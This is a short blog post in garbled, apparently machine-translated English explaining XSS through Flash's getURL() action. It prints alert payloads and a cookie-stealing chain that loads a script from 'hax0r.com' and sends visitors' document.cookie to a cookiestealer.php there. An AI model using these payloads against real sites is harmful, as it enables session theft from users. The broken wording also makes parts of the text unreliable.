Flash is used for complex animations, simulations,
*creation of games etc..
What’s interesting for us is the getURL() action.
This function allows us to redirect the end user to another page.
its syntax is built as follows:
getURL(url:String, [window: String,[method:String]])
exemple:
getURL("http://victime.com/login.php?logout=true","_self");
url: indicate the URL of the site
window: specify within which framework the request must take place (_self, _blank…)
method: method of request GET or POST (by defect GET)
here the handling of the actionscript and the Javascript to post a alert:
getURL("javascript:alert('XSS'");
in 2002 one will show the danger of this facility,
one could for example post the cookie of visitors in this manner:
getURL("javascript:alert(document.cookie)")
in December 2005, a new alternative and appeared
consisting has to benefit from a nonpermanent fault XSS
and possibility of putting a file flash in its signature to give a permanent XSS,
moreover the author of this alternative used this technique in order
to infect MySpace with a deviated worms xss of Samy: Samy Reloaded
cookie stealer in flash ?
not but there is technique to do it
exemple
in a flash file:
GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");
and in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;
For secure it simple solution: do not allow flash files in your web app
0 komentar:
Posting Komentar